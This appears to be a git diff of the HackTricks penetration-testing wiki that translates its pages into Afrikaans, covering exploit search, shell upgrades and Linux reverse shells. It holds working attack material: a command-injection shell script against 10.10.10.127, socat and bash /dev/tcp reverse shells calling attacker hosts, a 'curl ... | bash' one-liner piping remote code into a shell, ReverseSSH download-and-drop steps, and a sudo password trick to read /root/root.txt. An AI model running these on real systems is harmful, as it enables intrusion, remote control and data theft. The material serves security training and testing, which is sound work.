resp = s.post(target + "/login", data={"username":username, "password":password, "submit": "Login"}, proxies=proxies, verify=0)
return resp
resp = s.post(target + "/login", data={"username":username, "password":password, "submit": "Login"}, proxies=proxies, verify=0)
return resp
def get_info(name):
resp = s.post(target + "/projects", data={"name":name, }, proxies=proxies, verify=0)
guid = re.match('<a href="\/info\/([^"]*)">' + name + '</a>', resp.text)[1]
return guid
resp = s.post(target + "/projects", data={"name":name, }, proxies=proxies, verify=0)
guid = re.match('<a href="\/info\/([^"]*)">' + name + '</a>', resp.text)[1]
return guid
def upload(guid, filename, data):
resp = s.post(target + "/upload/" + guid, data={"submit": "upload"}, files={"file":(filename, data)}, proxies=proxies, verify=0)
guid = re.match('"' + filename + '": "([^"]*)"', resp.text)[1]
return guid
resp = s.post(target + "/upload/" + guid, data={"submit": "upload"}, files={"file":(filename, data)}, proxies=proxies, verify=0)
guid = re.match('"' + filename + '": "([^"]*)"', resp.text)[1]
return guid
def json_search(guid, search_string):
resp = s.post(target + "/api/search/" + guid + "/", json={"search":search_string}, headers={"Content-Type": "application/json"}, proxies=proxies, verify=0)
return resp.json()
resp = s.post(target + "/api/search/" + guid + "/", json={"search":search_string}, headers={"Content-Type": "application/json"}, proxies=proxies, verify=0)
return resp.json()
def get_random_string(guid, path):
return ''.join(random.choice(string.ascii_letters) for i in range(10))
return ''.join(random.choice(string.ascii_letters) for i in range(10))
```
## Python-opdrag om 'n RCE te benut
Om 'n RCE (Remote Code Execution) te benut, kan jy die volgende Python-opdrag gebruik:
```python
import requests
url = 'http://target-website.com/vulnerable-endpoint'
payload = '; <malicious-code-here>'
response = requests.get(url + payload)
print(response.text)
```
## Python cmd to exploit an RCE
Hier is die vertaling van die bogenoemde Python-opdrag na Afrikaans:
```python
import requests
url = 'http://teiken-webwerf.com/verkrygbare-eindpunt'
payload = '; <booswillige-kode-hier>'
response = requests.get(url + payload)
print(response.text)
```
Onthou om die `url`-veranderlike te vervang met die regte teikenwebwerf se URL en die `payload`-veranderlike met die spesifieke booswillige kode wat jy wil uitvoer.
```python
import requests
import re
from cmd import Cmd
class Terminal(Cmd):
prompt = "Inject => "
prompt = "Inject => "
def default(self, args):
output = RunCmd(args)
print(output)
def default(self, args):
output = RunCmd(args)
print(output)
def RunCmd(cmd):
data = { 'db': f'lol; echo -n "MYREGEXP"; {cmd}; echo -n "MYREGEXP2"' }
r = requests.post('http://10.10.10.127/select', data=data)
page = r.text
m = re.search('MYREGEXP(.*?)MYREGEXP2', page, re.DOTALL)
if m:
return m.group(1)
else:
return 1
data = { 'db': f'lol; echo -n "MYREGEXP"; {cmd}; echo -n "MYREGEXP2"' }
r = requests.post('http://10.10.10.127/select', data=data)
page = r.text
m = re.search('MYREGEXP(.*?)MYREGEXP2', page, re.DOTALL)
if m:
return m.group(1)
else:
return 1
term = Terminal()
term.cmdloop()
```
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomaties werkstrome te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\
Kry Vandag Toegang:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>

58
generic-methodologies-and-resources/search-exploits.md
View file

@ -1,37 +1,36 @@
# Search Exploits
# Soek Na Exploits
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en **outomatiese werksvloeie** te bou met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
Kry Vandag Toegang:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
### Browser
### Blaaier
Always search in "google" or others: **\<service\_name> \[version] exploit**
Soek altyd in "google" of ander: **\<diens\_naam> \[weergawe] exploit**
You should also try the **shodan** **exploit search** from [https://exploits.shodan.io/](https://exploits.shodan.io).
Jy moet ook die **shodan** **exploit-soektog** vanaf [https://exploits.shodan.io/](https://exploits.shodan.io) probeer.
### Searchsploit
Useful to search exploits for services in **exploitdb from the console.**
Nuttig om exploits vir dienste in **exploitdb vanaf die konsole** te soek.
```bash
#Searchsploit tricks
searchsploit "linux Kernel" #Example
@ -41,47 +40,44 @@ searchsploit -p 7618[.c] #Show complete path
searchsploit -x 7618[.c] #Open vi to inspect the exploit
searchsploit --nmap file.xml #Search vulns inside an nmap xml result
```
### Pompem
[https://github.com/rfunix/Pompem](https://github.com/rfunix/Pompem) is another tool to search for exploits
[https://github.com/rfunix/Pompem](https://github.com/rfunix/Pompem) is nog 'n instrument om na exploits te soek.
### MSF-Search
```bash
msf> search platform:windows port:135 target:XP type:exploit
```
### PacketStorm
If nothing is found, try to search the used technology inside [https://packetstormsecurity.com/](https://packetstormsecurity.com)
As niks gevind word nie, probeer om die gebruikte tegnologie binne [https://packetstormsecurity.com/](https://packetstormsecurity.com) te soek.
### Vulners
You can also search in vulners database: [https://vulners.com/](https://vulners.com)
Jy kan ook in die vulners databasis soek: [https://vulners.com/](https://vulners.com)
### Sploitus
This searches for exploits in other databases: [https://sploitus.com/](https://sploitus.com)
Hierdie soek na exploits in ander databasisse: [https://sploitus.com/](https://sploitus.com)
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\
Kry vandag toegang:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

36
generic-methodologies-and-resources/shells/README.md
View file

@ -1,16 +1,14 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>
@ -21,9 +19,9 @@ Other ways to support HackTricks:
# [**MSFVenom - CheatSheet**](msfvenom.md)
# [**Full TTYs**](full-ttys.md)
# [**Volledige TTY's**](full-ttys.md)
# **Auto-generated shells**
# **Outomaties gegenereerde shells**
* [**https://reverse-shell.sh/**](https://reverse-shell.sh/)
* [**https://www.revshells.com/**](https://www.revshells.com/)
@ -40,16 +38,14 @@ Other ways to support HackTricks:
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>

62
generic-methodologies-and-resources/shells/full-ttys.md
View file

@ -1,22 +1,22 @@
# Full TTYs
# Volledige TTYs
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
## Full TTY
## Volledige TTY
Note that the shell you set in the `SHELL` variable **must** be **listed inside** _**/etc/shells**_ or `The value for the SHELL variable was not found in the /etc/shells file This incident has been reported`. Also, note that the next snippets only work in bash. If you're in a zsh, change to a bash before obtaining the shell by running `bash`.
Let daarop dat die skulp wat jy in die `SHELL`-veranderlike stel, **moet** wees **opgesom binne** _**/etc/shells**_ of `Die waarde vir die SHELL-veranderlike is nie gevind in die /etc/shells-lêer nie. Hierdie voorval is aangemeld`. Let ook daarop dat die volgende snippe slegs werk in bash. As jy in 'n zsh is, verander na 'n bash voordat jy die skulp bekom deur `bash` uit te voer.
#### Python
@ -29,10 +29,10 @@ python3 -c 'import pty; pty.spawn("/bin/bash")'
{% endcode %}
{% hint style="info" %}
You can get the **number** of **rows** and **columns** executing **`stty -a`**
Jy kan die **aantal** van **rye** en **kolomme** kry deur **`stty -a`** uit te voer
{% endhint %}
#### script
#### skrip
{% code overflow="wrap" %}
```bash
@ -42,7 +42,6 @@ script /dev/null -qc /bin/bash #/dev/null is to not store anything
{% endcode %}
#### socat
```bash
#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444
@ -50,8 +49,7 @@ socat file:`tty`,raw,echo=0 tcp-listen:4444
#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
```
### **Spawn shells**
### **Spawn skulpe**
* `python -c 'import pty; pty.spawn("/bin/sh")'`
* `echo os.system('/bin/bash')`
@ -68,11 +66,11 @@ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
## ReverseSSH
A convenient way for **interactive shell access**, as well as **file transfers** and **port forwarding**, is dropping the statically-linked ssh server [ReverseSSH](https://github.com/Fahrj/reverse-ssh) onto the target.
'n Gerieflike manier vir **interaktiewe skulptoegang**, sowel as **lêeroordragte** en **poort deurstuur**, is om die staties gekoppelde ssh-bediener [ReverseSSH](https://github.com/Fahrj/reverse-ssh) op die teiken te plaas.
Below is an example for `x86` with upx-compressed binaries. For other binaries, check [releases page](https://github.com/Fahrj/reverse-ssh/releases/latest/).
Hieronder is 'n voorbeeld vir `x86` met upx-gekomprimeerde binaêre lêers. Vir ander binaêre lêers, kyk na die [vrylatingsbladsy](https://github.com/Fahrj/reverse-ssh/releases/latest/).
1. Prepare locally to catch the ssh port forwarding request:
1. Maak lokaal gereed om die ssh-poortdeurstuurversoek te ontvang:
{% code overflow="wrap" %}
```bash
@ -83,7 +81,7 @@ wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_revers
```
{% endcode %}
* (2a) Linux target:
* (2a) Linux teiken:
{% code overflow="wrap" %}
```bash
@ -94,7 +92,7 @@ wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_revers
```
{% endcode %}
* (2b) Windows 10 target (for earlier versions, check [project readme](https://github.com/Fahrj/reverse-ssh#features)):
* (2b) Windows 10 teiken (vir vroeëre weergawes, kyk na [projek leesmy](https://github.com/Fahrj/reverse-ssh#features)):
{% code overflow="wrap" %}
```bash
@ -105,8 +103,7 @@ reverse-ssh.exe -p 4444 kali@10.0.0.2
```
{% endcode %}
* If the ReverseSSH port forwarding request was successful, you should now be able to log in with the default password `letmeinbrudipls` in the context of the user running `reverse-ssh(.exe)`:
* As die ReverseSSH-poort deurstuurversoek suksesvol was, moet jy nou in staat wees om in te teken met die verstek wagwoord `letmeinbrudipls` in die konteks van die gebruiker wat `reverse-ssh(.exe)` uitvoer:
```bash
# Interactive shell access
ssh -p 8888 127.0.0.1
@ -114,25 +111,22 @@ ssh -p 8888 127.0.0.1
# Bidirectional file transfer
sftp -P 8888 127.0.0.1
```
## Geen TTY
## No TTY
If for some reason you cannot obtain a full TTY you **still can interact with programs** that expect user input. In the following example, the password is passed to `sudo` to read a file:
As jy om een of ander rede nie 'n volledige TTY kan verkry nie, kan jy steeds met programme interaksie hê wat gebruikersinvoer verwag. In die volgende voorbeeld word die wagwoord aan `sudo` oorgedra om 'n lêer te lees:
```bash
expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "<THE_PASSWORD_OF_THE_USER>";send "\r\n";interact'
```
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>

618
generic-methodologies-and-resources/shells/linux.md
View file

@ -1,35 +1,34 @@
# Shells - Linux
# Skulpe - Linux
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
Vind kwesbaarhede wat die belangrikste is sodat jy hulle vinniger kan regstel. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks).
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
***
**If you have questions about any of these shells you could check them with** [**https://explainshell.com/**](https://explainshell.com)
**As jy vrae het oor enige van hierdie skulpe, kan jy dit nagaan met** [**https://explainshell.com/**](https://explainshell.com)
## Full TTY
## Volledige TTY
**Once you get a reverse shell**[ **read this page to obtain a full TTY**](full-ttys.md)**.**
**Sodra jy 'n omgekeerde skulp kry**[ **lees hierdie bladsy om 'n volledige TTY te verkry**](full-ttys.md)**.**
## Bash | sh
```bash
curl https://reverse-shell.sh/1.1.1.1:3000 | bash
bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1
@ -42,11 +41,9 @@ exec 5<>/dev/tcp/<ATTACKER-IP>/<PORT>; while read line 0<&5; do $line 2>&5 >&5;
#after getting the previous shell to get the output to execute
exec >&0
```
Moenie vergeet om te kyk na ander skulpe nie: sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, en bash.
Don't forget to check with other shells: sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, and bash.
### Symbol safe shell
### Simbool veilige skulp
```bash
#If you need a more stable connection do:
bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1'
@ -55,38 +52,34 @@ bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1'
#B64 encode the shell like: echo "bash -c 'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1'" | base64 -w0
